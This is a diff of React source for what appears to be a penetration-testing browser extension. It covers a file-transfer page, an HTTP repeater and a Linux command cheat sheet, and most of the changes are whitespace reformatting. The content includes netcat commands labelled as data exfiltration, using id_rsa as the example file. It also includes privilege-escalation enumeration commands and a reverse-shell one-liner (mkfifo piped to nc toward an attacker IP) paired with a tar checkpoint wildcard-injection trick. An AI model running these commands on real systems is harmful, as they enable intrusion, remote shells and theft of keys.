const python2_server = `python -m SimpleHTTPServer ${ values.port }`;
const scp = `scp ${ values.file_name } username@${ values.ip || 'IP' }:~/destination ${ values.port &&
'-P ' + values.port }`;
const scp_dl = `scp user@${ values.ip || 'IP' }:~/path_to_file file_saved ${ values.port && '-P ' + values.port }`;
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
File Transfer
</Title>
<Paragraph style={{ margin: 15 }}>
Various method of data exfiltration and download from a remote machine.
</Paragraph>
<div style={{ padding: 15 }}>
<Row gutter={{ xs: 8, sm: 16, md: 24, lg: 32 }}>
<Col span={8}>
<Input
maxLength={15}
prefix={<WifiOutlined />}
name='Ip adress'
placeholder='IP Address or domain (ex: 212.212.111.222)'
onChange={handleChange('ip')}
value={values.ip}
/>
</Col>
<Col span={8}>
<Input
maxLength={5}
prefix={<IconFont type='icon-Network-Plug' />}
name='Port'
placeholder='Port (ex: 1337)'
onChange={handleChange('port')}
value={values.port}
/>
</Col>
<Col span={8}>
<Input
prefix={<FolderOutlined />}
name='File name'
placeholder='Filename (ex: id_rsa)'
onChange={handleChange('file_name')}
value={values.file_name}
/>
</Col>
</Row>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>
Bash Upload <IconFont type='icon-gnubash' />
</Title>
<Text strong># Upload file over HTTP (require HTTP service running on the attacker machine)</Text>
<Paragraph copyable code editable ellipsis={true}>
{bash_transfer}
</Paragraph>
<Text strong style={{ marginTop: '1em' }}>
# Exfiltrate file over TCP
</Text>
<Text strong style={{ marginTop: '1em' }}>
# Listen with Netcat on port {values.port} + output redirection
</Text>
<Paragraph copyable>
nc -l -p {values.port} {'>'} data
</Paragraph>
<Paragraph copyable code editable ellipsis={true}>
{bash_tcp_transfer}
</Paragraph>
<Title level={3}>
Bash Download <IconFont type='icon-gnubash' />
</Title>
<Text strong># Send via netcat</Text>
<Paragraph copyable code editable ellipsis={true}>
nc -l -p {values.port} {'<'} {values.file_name}
</Paragraph>
<Text strong># Download file on the other machine</Text>
<Paragraph copyable code editable ellipsis={true}>
{bash_download}
</Paragraph>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='b'>
<Title level={3}>
Netcat <IconFont type='icon-command-line' />
</Title>
<Text strong># Upload payload</Text>
<Paragraph copyable code editable ellipsis={true}>
nc -lnvp ; {values.port}
{netcat_transfer}
</Paragraph>
<Text strong style={{ marginTop: '2em' }}>
# Download
</Text>
<Paragraph copyable code editable ellipsis>
nc {values.ip} {values.port} {'<'} {values.file_name}
</Paragraph>
<Paragraph copyable code editable ellipsis>
nc -lnvp {values.port} {'>'} file_saved
</Paragraph>
</div>
<Divider dashed />
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
Python <IconFont type='icon-python' />
</Title>
<Text strong># Python3 HTTP Server</Text>
<Paragraph copyable code editable ellipsis={true} style={{ marginBottom: '1em' }}>
{python_server}
</Paragraph>
<Text strong># Python2 HTTP Server</Text>
<Paragraph copyable code editable ellipsis>
{python2_server}
</Paragraph>
</div>
<Divider dashed />
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
SCP <IconFont type='icon-filelock' />
</Title>
<Text strong># Upload from local host to remote computer</Text>
<Paragraph copyable code editable ellipsis={true} style={{ marginBottom: '1em' }}>
{scp}
</Paragraph>
<Text strong># Download from remote computer</Text>
<Paragraph copyable code editable ellipsis={true} style={{ marginBottom: '1em' }}>
{scp_dl}
</Paragraph>
</div>
</QueueAnim>
);
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
File Transfer
</Title>
<Paragraph style={{ margin: 15 }}>
Various method of data exfiltration and download from a remote machine.
</Paragraph>
<div style={{ padding: 15 }}>
<Row gutter={{ xs: 8, sm: 16, md: 24, lg: 32 }}>
<Col span={8}>
<Input
maxLength={15}
prefix={<WifiOutlined />}
name='Ip adress'
placeholder='IP Address or domain (ex: 212.212.111.222)'
onChange={handleChange( 'ip' )}
value={values.ip}
/>
</Col>
<Col span={8}>
<Input
maxLength={5}
prefix={<IconFont type='icon-Network-Plug' />}
name='Port'
placeholder='Port (ex: 1337)'
onChange={handleChange( 'port' )}
value={values.port}
/>
</Col>
<Col span={8}>
<Input
prefix={<FolderOutlined />}
name='File name'
placeholder='Filename (ex: id_rsa)'
onChange={handleChange( 'file_name' )}
value={values.file_name}
/>
</Col>
</Row>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>
Bash Upload <IconFont type='icon-gnubash' />
</Title>
<Text strong># Upload file over HTTP (require HTTP service running on the attacker machine)</Text>
<Paragraph copyable code editable ellipsis={true}>
{bash_transfer}
</Paragraph>
<Text strong style={{ marginTop: '1em' }}>
# Exfiltrate file over TCP
</Text>
<Text strong style={{ marginTop: '1em' }}>
# Listen with Netcat on port {values.port} + output redirection
</Text>
<Paragraph copyable>
nc -l -p {values.port} {'>'} data
</Paragraph>
<Paragraph copyable code editable ellipsis={true}>
{bash_tcp_transfer}
</Paragraph>
<Title level={3}>
Bash Download <IconFont type='icon-gnubash' />
</Title>
<Text strong># Send via netcat</Text>
<Paragraph copyable code editable ellipsis={true}>
nc -l -p {values.port} {'<'} {values.file_name}
</Paragraph>
<Text strong># Download file on the other machine</Text>
<Paragraph copyable code editable ellipsis={true}>
{bash_download}
</Paragraph>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='b'>
<Title level={3}>
Netcat <IconFont type='icon-command-line' />
</Title>
<Text strong># Upload payload</Text>
<Paragraph copyable code editable ellipsis={true}>
nc -lnvp ; {values.port}
{netcat_transfer}
</Paragraph>
<Text strong style={{ marginTop: '2em' }}>
# Download
</Text>
<Paragraph copyable code editable ellipsis>
nc {values.ip} {values.port} {'<'} {values.file_name}
</Paragraph>
<Paragraph copyable code editable ellipsis>
nc -lnvp {values.port} {'>'} file_saved
</Paragraph>
</div>
<Divider dashed />
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
Python <IconFont type='icon-python' />
</Title>
<Text strong># Python3 HTTP Server</Text>
<Paragraph copyable code editable ellipsis={true} style={{ marginBottom: '1em' }}>
{python_server}
</Paragraph>
<Text strong># Python2 HTTP Server</Text>
<Paragraph copyable code editable ellipsis>
{python2_server}
</Paragraph>
</div>
<Divider dashed />
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
SCP <IconFont type='icon-filelock' />
</Title>
<Text strong># Upload from local host to remote computer</Text>
<Paragraph copyable code editable ellipsis={true} style={{ marginBottom: '1em' }}>
{scp}
</Paragraph>
<Text strong># Download from remote computer</Text>
<Paragraph copyable code editable ellipsis={true} style={{ marginBottom: '1em' }}>
{scp_dl}
</Paragraph>
</div>
</QueueAnim>
);
}

564
src/components/http_utils/HTTP-Utils.tsx
View File

@@ -1,18 +1,18 @@
import React, { useState } from 'react';
import {
Button,
Typography,
Row,
Col,
Input,
Select,
Divider,
Tag,
message,
Descriptions,
Modal,
Tabs,
Alert
Button,
Typography,
Row,
Col,
Input,
Select,
Divider,
Tag,
message,
Descriptions,
Modal,
Tabs,
Alert
} from 'antd';
import { SendOutlined, FullscreenOutlined, ArrowsAltOutlined, DeleteOutlined } from '@ant-design/icons';
import { vs2015 } from 'react-syntax-highlighter/dist/esm/styles/hljs';
@@ -27,280 +27,280 @@ const { TabPane } = Tabs;
const { TextArea } = Input;
const { Option } = Select;
export default function LinuxCommands() {
const http_url = PersistedState('http_url_repeater');
const [ isModalVisible, setIsModalVisible ] = useState(false);
export default function LinuxCommands () {
const http_url = PersistedState( 'http_url_repeater' );
const [ isModalVisible, setIsModalVisible ] = useState( false );
const windowMode = () => {
const width = 1100;
const height = 800;
const windowMode = () => {
const width = 1100;
const height = 800;
chrome.windows.create({
url: chrome.extension.getURL('index.html'),
width: width,
height: height,
type: 'popup'
});
};
const target = window.location.href;
const showModal = () => {
setIsModalVisible(true);
};
const handleClose = () => {
setIsModalVisible(false);
};
chrome.windows.create( {
url: chrome.extension.getURL( 'index.html' ),
width: width,
height: height,
type: 'popup'
} );
};
const target = window.location.href;
const showModal = () => {
setIsModalVisible( true );
};
const handleClose = () => {
setIsModalVisible( false );
};
interface IHTTP_UtilsProps {
url: string;
protocol: string;
type: string;
}
interface IHTTP_UtilsProps {
url: string;
protocol: string;
type: string;
}
const [ values, setValues ] = http_url<IHTTP_UtilsProps>({
url: '',
protocol: 'http://',
type: 'GET'
});
const handleChange = (name: string) => (event: { target: { value: string } }) => {
setValues({ ...values, [name]: event.target.value });
};
const handleChangeSelect = (name: string) => (event: string) => {
setValues({ ...values, [name]: event });
};
const [ values, setValues ] = http_url<IHTTP_UtilsProps>( {
url: '',
protocol: 'http://',
type: 'GET'
} );
const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {
setValues( { ...values, [ name ]: event.target.value } );
};
const handleChangeSelect = ( name: string ) => ( event: string ) => {
setValues( { ...values, [ name ]: event } );
};
interface ContentProps {
status: string | number;
statusText: string;
headers: {
[key: string]: string;
};
data: string;
}
// Axios fetch
const key = 'updatable';
const [ content, setContent ] = useState<ContentProps>();
const [ headerContent, setHeaderContent ] = useState([]);
const [ commentResponse, setCommentResponse ] = useState([]);
const [ inputResponse, setInputResponse ] = useState([]);
const [ _, setLoading ] = useState<Boolean>();
const handleDelete = () => {
setContent(undefined);
setHeaderContent([]);
setCommentResponse([]);
setInputResponse([]);
values.url = '';
};
interface ContentProps {
status: string | number;
statusText: string;
headers: {
[ key: string ]: string;
};
data: string;
}
// Axios fetch
const key = 'updatable';
const [ content, setContent ] = useState<ContentProps>();
const [ headerContent, setHeaderContent ] = useState( [] );
const [ commentResponse, setCommentResponse ] = useState( [] );
const [ inputResponse, setInputResponse ] = useState( [] );
const [ _, setLoading ] = useState<Boolean>();
const handleDelete = () => {
setContent( undefined );
setHeaderContent( [] );
setCommentResponse( [] );
setInputResponse( [] );
values.url = '';
};
const fetchData = async () => {
message.loading({ content: 'Loading...', key });
await axios({
method: values.type as Method,
url: values.protocol + values.url.replace(/https?:\/\//, ''),
headers: {}
})
.then((res: React.ComponentState) => {
setLoading(false); // Set the loading to false
setContent(res); // Axios response
message.success({ content: 'Loaded!', key });
setHeaderContent(res.headers['content-type']); // Header content
console.log(res);
const commentOnlyRegex = res.data.match(
RegExp(/(\/\*[\w\'\s\r\n\*]*\*\/)|(\/\/[\w\s\']*)|(\<![\-\-\s\w\>\/]*\>)/, 'g')
);
if (commentOnlyRegex != null) setCommentResponse(commentOnlyRegex);
const inputOnlyRegex = res.data.match(RegExp(/<form(.*?)<\/form>/, 'g'));
if (inputOnlyRegex != null) setInputResponse(inputOnlyRegex);
})
.catch((err) => {
console.log(err);
message.error({ content: err.message, key });
});
};
const fetchData = async () => {
message.loading( { content: 'Loading...', key } );
await axios( {
method: values.type as Method,
url: values.protocol + values.url.replace( /https?:\/\//, '' ),
headers: {}
} )
.then( ( res: React.ComponentState ) => {
setLoading( false ); // Set the loading to false
setContent( res ); // Axios response
message.success( { content: 'Loaded!', key } );
setHeaderContent( res.headers[ 'content-type' ] ); // Header content
console.log( res );
const commentOnlyRegex = res.data.match(
RegExp( /(\/\*[\w\'\s\r\n\*]*\*\/)|(\/\/[\w\s\']*)|(\<![\-\-\s\w\>\/]*\>)/, 'g' )
);
if ( commentOnlyRegex != null ) setCommentResponse( commentOnlyRegex );
const inputOnlyRegex = res.data.match( RegExp( /<form(.*?)<\/form>/, 'g' ) );
if ( inputOnlyRegex != null ) setInputResponse( inputOnlyRegex );
} )
.catch( ( err ) => {
console.log( err );
message.error( { content: err.message, key } );
} );
};
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
HTTP Repeater
</Title>
<Paragraph style={{ marginLeft: 15 }}>
HTTP Repeater is a simple tool for manually manipulating and reissuing individual HTTP and WebSocket
messages, and analyzing the application's responses. You can use Repeater for all kinds of purposes,
such as changing parameter values to test for input-based vulnerabilities, issuing requests in a
specific sequence to test for logic flaws.
</Paragraph>
<Divider dashed />
<Row gutter={[ 16, 16 ]} style={{ padding: 15 }}>
<Col>
<Select
defaultValue='GET'
style={{ width: '100%' }}
value={values.type}
placeholder='GET'
onChange={handleChangeSelect('type')}
>
<Option value='GET'>GET</Option>
<Option value='POST'>POST</Option>
<Option value='HEAD'>HEAD</Option>
<Option value='PUT'>PUT</Option>
<Option value='DELETE'>DELETE</Option>
<Option value='OPTIONS'>OPTIONS</Option>
<Option value='PATCH'>PATCH</Option>
</Select>
</Col>
<Col>
<Select
defaultValue='http://'
style={{ width: '100%' }}
value={values.protocol}
placeholder='http://'
onChange={handleChangeSelect('protocol')}
>
<Option value='http://'>HTTP</Option>
<Option value='https://'>HTTPS</Option>
</Select>
</Col>
<Col span={9}>
<Input
style={{ borderColor: '#434343' }}
onChange={handleChange('url')}
onSubmit={() => fetchData()}
allowClear
value={values.url.replace(/https?:\/\//, '')}
placeholder='http://10.10.14.15:1337/home?a=1 OR example.com'
/>
</Col>
<Col>
<Button type='primary' onClick={() => fetchData()} icon={<SendOutlined />}>
Send
</Button>
</Col>
<Col>
<Button type='link' danger icon={<DeleteOutlined />} onClick={() => handleDelete()} />
</Col>
</Row>
{content != undefined ? (
<div style={{ padding: 15 }}>
<Descriptions title='Request info' style={{ marginBottom: 15 }}>
<Descriptions.Item label='Status code'>
<Tag color='success'>
{content.status} {content.statusText}
</Tag>
</Descriptions.Item>
<Descriptions.Item label='Server'>
<Tag color='processing'>{content.headers.server || 'Undefined'}</Tag>
</Descriptions.Item>
<Descriptions.Item label='Content-Type'>
<Tag color='geekblue'>{headerContent}</Tag>
</Descriptions.Item>
<Descriptions.Item label='URL'>
<a href={values.protocol + values.url} target='_blank'>
{values.protocol + values.url}
</a>
</Descriptions.Item>
</Descriptions>
<Row gutter={[ 16, 16 ]} style={{ marginBottom: 15 }}>
<Col span={12}>
<TextArea
autoSize={{ minRows: 5 }}
disabled
value={JSON.stringify(content.headers, undefined, 2)}
rows={4}
/>
</Col>
<Col span={12}>
<TextArea
autoSize={{ minRows: 5 }}
value={JSON.stringify(content.headers, undefined, 2)}
rows={4}
/>
</Col>
</Row>
<Tabs defaultActiveKey='1'>
<TabPane tab='HTML Response' key='1'>
<Row justify='end' style={{ marginTop: 5 }}>
<Col>
<Button type='link' onClick={showModal}>
Render the HTML
</Button>
</Col>
</Row>
<Modal
title='HTML Response'
onCancel={handleClose}
visible={isModalVisible}
onOk={handleClose}
width={650}
>
<div dangerouslySetInnerHTML={{ __html: content.data || '' }} />
</Modal>
<SyntaxHighlighter language='htmlbars' style={vs2015} showLineNumbers={true}>
{pretty(content.data) || <pre>No response</pre>}
</SyntaxHighlighter>
</TabPane>
{!commentResponse && (
<TabPane tab='Comment Only' key='2'>
{commentResponse.map(
(
matches:
| string
| number
| boolean
| {}
| React.ReactElement<any, string | React.JSXElementConstructor<any>>
| React.ReactNodeArray
| React.ReactPortal
| null
| undefined
) => {
return (
<SyntaxHighlighter language='htmlbars' style={vs2015}>
{matches};
</SyntaxHighlighter>
);
}
)}
</TabPane>
)}
{!inputResponse && (
<TabPane tab='Form / Input Only' key='3'>
{inputResponse.map((matches: string) => {
return (
<SyntaxHighlighter language='htmlbars' style={vs2015} showLineNumbers={true}>
{pretty(matches)};
</SyntaxHighlighter>
);
})}
</TabPane>
)}
</Tabs>
</div>
) : (
<div style={{ padding: 15 }}>
<Alert
message='Informational Notes'
description='We recommend our users to use this feature in Fullscreen mode or Pop-up mode.'
type='info'
showIcon
/>
<Button
icon={<FullscreenOutlined style={{ marginRight: 5 }} />}
style={{ marginTop: 15 }}
type='link'
danger
>
<a href={target} style={{ color: '#a61d24' }} rel='noreferrer noopener' target='_blank'>
Fullscreen mode
</a>
</Button>
<Button
icon={<ArrowsAltOutlined style={{ marginTop: 5 }} />}
onClick={() => windowMode()}
type='link'
>
Pop-up mode
</Button>
</div>
)}
</QueueAnim>
);
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
HTTP Repeater
</Title>
<Paragraph style={{ marginLeft: 15 }}>
HTTP Repeater is a simple tool for manually manipulating and reissuing individual HTTP and WebSocket
messages, and analyzing the application's responses. You can use Repeater for all kinds of purposes,
such as changing parameter values to test for input-based vulnerabilities, issuing requests in a
specific sequence to test for logic flaws.
</Paragraph>
<Divider dashed />
<Row gutter={[ 16, 16 ]} style={{ padding: 15 }}>
<Col>
<Select
defaultValue='GET'
style={{ width: '100%' }}
value={values.type}
placeholder='GET'
onChange={handleChangeSelect( 'type' )}
>
<Option value='GET'>GET</Option>
<Option value='POST'>POST</Option>
<Option value='HEAD'>HEAD</Option>
<Option value='PUT'>PUT</Option>
<Option value='DELETE'>DELETE</Option>
<Option value='OPTIONS'>OPTIONS</Option>
<Option value='PATCH'>PATCH</Option>
</Select>
</Col>
<Col>
<Select
defaultValue='http://'
style={{ width: '100%' }}
value={values.protocol}
placeholder='http://'
onChange={handleChangeSelect( 'protocol' )}
>
<Option value='http://'>HTTP</Option>
<Option value='https://'>HTTPS</Option>
</Select>
</Col>
<Col span={9}>
<Input
style={{ borderColor: '#434343' }}
onChange={handleChange( 'url' )}
onSubmit={() => fetchData()}
allowClear
value={values.url.replace( /https?:\/\//, '' )}
placeholder='http://10.10.14.15:1337/home?a=1 OR example.com'
/>
</Col>
<Col>
<Button type='primary' onClick={() => fetchData()} icon={<SendOutlined />}>
Send
</Button>
</Col>
<Col>
<Button type='link' danger icon={<DeleteOutlined />} onClick={() => handleDelete()} />
</Col>
</Row>
{content != undefined ? (
<div style={{ padding: 15 }}>
<Descriptions title='Request info' style={{ marginBottom: 15 }}>
<Descriptions.Item label='Status code'>
<Tag color='success'>
{content.status} {content.statusText}
</Tag>
</Descriptions.Item>
<Descriptions.Item label='Server'>
<Tag color='processing'>{content.headers.server || 'Undefined'}</Tag>
</Descriptions.Item>
<Descriptions.Item label='Content-Type'>
<Tag color='geekblue'>{headerContent}</Tag>
</Descriptions.Item>
<Descriptions.Item label='URL'>
<a href={values.protocol + values.url} target='_blank'>
{values.protocol + values.url}
</a>
</Descriptions.Item>
</Descriptions>
<Row gutter={[ 16, 16 ]} style={{ marginBottom: 15 }}>
<Col span={12}>
<TextArea
autoSize={{ minRows: 5 }}
disabled
value={JSON.stringify( content.headers, undefined, 2 )}
rows={4}
/>
</Col>
<Col span={12}>
<TextArea
autoSize={{ minRows: 5 }}
value={JSON.stringify( content.headers, undefined, 2 )}
rows={4}
/>
</Col>
</Row>
<Tabs defaultActiveKey='1'>
<TabPane tab='HTML Response' key='1'>
<Row justify='end' style={{ marginTop: 5 }}>
<Col>
<Button type='link' onClick={showModal}>
Render the HTML
</Button>
</Col>
</Row>
<Modal
title='HTML Response'
onCancel={handleClose}
visible={isModalVisible}
onOk={handleClose}
width={650}
>
<div dangerouslySetInnerHTML={{ __html: content.data || '' }} />
</Modal>
<SyntaxHighlighter language='htmlbars' style={vs2015} showLineNumbers={true}>
{pretty( content.data ) || <pre>No response</pre>}
</SyntaxHighlighter>
</TabPane>
{!commentResponse && (
<TabPane tab='Comment Only' key='2'>
{commentResponse.map(
(
matches:
| string
| number
| boolean
| {}
| React.ReactElement<any, string | React.JSXElementConstructor<any>>
| React.ReactNodeArray
| React.ReactPortal
| null
| undefined
) => {
return (
<SyntaxHighlighter language='htmlbars' style={vs2015}>
{matches};
</SyntaxHighlighter>
);
}
)}
</TabPane>
)}
{!inputResponse && (
<TabPane tab='Form / Input Only' key='3'>
{inputResponse.map( ( matches: string ) => {
return (
<SyntaxHighlighter language='htmlbars' style={vs2015} showLineNumbers={true}>
{pretty( matches )};
</SyntaxHighlighter>
);
} )}
</TabPane>
)}
</Tabs>
</div>
) : (
<div style={{ padding: 15 }}>
<Alert
message='Informational Notes'
description='We recommend our users to use this feature in Fullscreen mode or Pop-up mode.'
type='info'
showIcon
/>
<Button
icon={<FullscreenOutlined style={{ marginRight: 5 }} />}
style={{ marginTop: 15 }}
type='link'
danger
>
<a href={target} style={{ color: '#a61d24' }} rel='noreferrer noopener' target='_blank'>
Fullscreen mode
</a>
</Button>
<Button
icon={<ArrowsAltOutlined style={{ marginTop: 5 }} />}
onClick={() => windowMode()}
type='link'
>
Pop-up mode
</Button>
</div>
)}
</QueueAnim>
);
}

496
src/components/linux/LinuxCommands.tsx
View File

@@ -3,253 +3,253 @@ import { Typography, Divider } from 'antd';
import QueueAnim from 'rc-queue-anim';
const { Title, Paragraph } = Typography;
export default function LinuxCommands() {
const Suid = [
{ title: 'find / -user root -perm /4000 2>/dev/null' },
{ title: 'find / -perm -u=s -type f 2>/dev/null' },
{ title: "find / -type f -name '*.txt' 2>/dev/null" },
{ title: 'find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid' },
{ title: 'getcap -r / 2>/dev/null' }
];
const VersionSystem = [
{ title: 'cat /etc/issue' },
{ title: 'cat /etc/*-release' },
{ title: 'cat /etc/lsb-release' },
{ title: 'cat /etc/redhat-release' }
];
const KernelVersion = [
{ title: 'cat /proc/version' },
{ title: 'uname -a' },
{ title: 'uname -mrs' },
{ title: 'rpm -q kernel' },
{ title: 'dmesg | grep Linux' },
{ title: 'ls /boot | grep vmlinuz' }
];
const EnvironmentVariables = [
{ title: 'cat /etc/profile' },
{ title: 'cat /etc/bashrc' },
{ title: 'cat ~/.bash_profile' },
{ title: 'cat ~/.bashrc' },
{ title: 'cat ~/.bash_logout' },
{ title: 'env' },
{ title: 'set' }
];
const ServiceSettings = [
{ title: 'cat /etc/syslog.conf' },
{ title: 'cat /etc/chttp.conf' },
{ title: 'cat /etc/lighttpd.conf' },
{ title: 'cat /etc/cups/cupsd.conf' },
{ title: 'cat /etc/inetd.conf' },
{ title: 'cat /etc/apache2/apache2.conf' },
{ title: 'cat /etc/my.conf' },
{ title: 'cat /etc/httpd/conf/httpd.conf' },
{ title: 'cat /opt/lampp/etc/httpd.conf' },
{ title: 'ls -aRl /etc/ | awk $1 ~ /^.*r.*/' }
];
const CronJobs = [
{ title: 'crontab -l' },
{ title: 'ls -alh /var/spool/cron' },
{ title: 'ls -al /etc/ | grep cron' },
{ title: 'ls -al /etc/cron*' },
{ title: 'cat /etc/cron*' },
{ title: 'cat /etc/at.allow' },
{ title: 'cat /etc/at.deny' },
{ title: 'cat /etc/cron.allow' },
{ title: 'cat /etc/cron.deny' },
{ title: 'cat /etc/crontab' },
{ title: 'cat /etc/anacrontab' },
{ title: 'cat /var/spool/cron/crontabs/root' }
];
const UsersHost = [
{ title: 'lsof -i' },
{ title: 'lsof -i :80' },
{ title: 'grep 80 /etc/services' },
{ title: 'netstat -antup' },
{ title: 'netstat -antpx' },
{ title: 'netstat -tulpn' },
{ title: 'chkconfig --list' },
{ title: 'chkconfig --list | grep 3:on' },
{ title: 'last' },
{ title: 'lastlog' }
];
const PortForwarding = [
{
title: '# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]'
},
{ title: 'FPipe.exe -l 80 -r 80 -s 80 192.168.1.7' },
{
title: '# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]'
},
{ title: 'ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port' },
{ title: 'ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port' },
{
title: '# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe'
},
{
title: 'mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay'
},
{
title:
'mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)'
},
{ title: 'backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc' },
{
title: 'localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)'
}
];
const wildcardPrivesc = [
{
title: ` echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
export default function LinuxCommands () {
const Suid = [
{ title: 'find / -user root -perm /4000 2>/dev/null' },
{ title: 'find / -perm -u=s -type f 2>/dev/null' },
{ title: "find / -type f -name '*.txt' 2>/dev/null" },
{ title: 'find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid' },
{ title: 'getcap -r / 2>/dev/null' }
];
const VersionSystem = [
{ title: 'cat /etc/issue' },
{ title: 'cat /etc/*-release' },
{ title: 'cat /etc/lsb-release' },
{ title: 'cat /etc/redhat-release' }
];
const KernelVersion = [
{ title: 'cat /proc/version' },
{ title: 'uname -a' },
{ title: 'uname -mrs' },
{ title: 'rpm -q kernel' },
{ title: 'dmesg | grep Linux' },
{ title: 'ls /boot | grep vmlinuz' }
];
const EnvironmentVariables = [
{ title: 'cat /etc/profile' },
{ title: 'cat /etc/bashrc' },
{ title: 'cat ~/.bash_profile' },
{ title: 'cat ~/.bashrc' },
{ title: 'cat ~/.bash_logout' },
{ title: 'env' },
{ title: 'set' }
];
const ServiceSettings = [
{ title: 'cat /etc/syslog.conf' },
{ title: 'cat /etc/chttp.conf' },
{ title: 'cat /etc/lighttpd.conf' },
{ title: 'cat /etc/cups/cupsd.conf' },
{ title: 'cat /etc/inetd.conf' },
{ title: 'cat /etc/apache2/apache2.conf' },
{ title: 'cat /etc/my.conf' },
{ title: 'cat /etc/httpd/conf/httpd.conf' },
{ title: 'cat /opt/lampp/etc/httpd.conf' },
{ title: 'ls -aRl /etc/ | awk $1 ~ /^.*r.*/' }
];
const CronJobs = [
{ title: 'crontab -l' },
{ title: 'ls -alh /var/spool/cron' },
{ title: 'ls -al /etc/ | grep cron' },
{ title: 'ls -al /etc/cron*' },
{ title: 'cat /etc/cron*' },
{ title: 'cat /etc/at.allow' },
{ title: 'cat /etc/at.deny' },
{ title: 'cat /etc/cron.allow' },
{ title: 'cat /etc/cron.deny' },
{ title: 'cat /etc/crontab' },
{ title: 'cat /etc/anacrontab' },
{ title: 'cat /var/spool/cron/crontabs/root' }
];
const UsersHost = [
{ title: 'lsof -i' },
{ title: 'lsof -i :80' },
{ title: 'grep 80 /etc/services' },
{ title: 'netstat -antup' },
{ title: 'netstat -antpx' },
{ title: 'netstat -tulpn' },
{ title: 'chkconfig --list' },
{ title: 'chkconfig --list | grep 3:on' },
{ title: 'last' },
{ title: 'lastlog' }
];
const PortForwarding = [
{
title: '# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]'
},
{ title: 'FPipe.exe -l 80 -r 80 -s 80 192.168.1.7' },
{
title: '# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]'
},
{ title: 'ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port' },
{ title: 'ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port' },
{
title: '# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe'
},
{
title: 'mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay'
},
{
title:
'mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)'
},
{ title: 'backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc' },
{
title: 'localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)'
}
];
const wildcardPrivesc = [
{
title: ` echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
1234 >/tmp/f" > shell.sh`
},
{
title: `touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"`
},
{
title: ` touch "/var/www/html/--checkpoint=1"`
}
];
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Useful Linux command for your Penetration Testing
</Title>
<Paragraph style={{ margin: 15 }}>List of useful commands on Linux</Paragraph>
<Divider orientation='center'>SUID Commands</Divider>
<div
key='a'
style={{
padding: 15
}}
>
{Suid.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>What version of the system ?</Divider>
<div
key='b'
style={{
padding: 15
}}
>
{VersionSystem.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>What is its kernel version ?</Divider>
<div
key='c'
style={{
padding: 15
}}
>
{KernelVersion.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>What is the environment variables ?</Divider>
<div
key='d'
style={{
padding: 15
}}
>
{EnvironmentVariables.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>Service settings, there is any wrong allocation?</Divider>
<div
key='e'
style={{
padding: 15
}}
>
{ServiceSettings.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>Is there any cron jobs ?</Divider>
<div
key='f'
style={{
padding: 15
}}
>
{CronJobs.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>Other users host communication with the system ?</Divider>
<div
key='g'
style={{
padding: 15
}}
>
{UsersHost.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
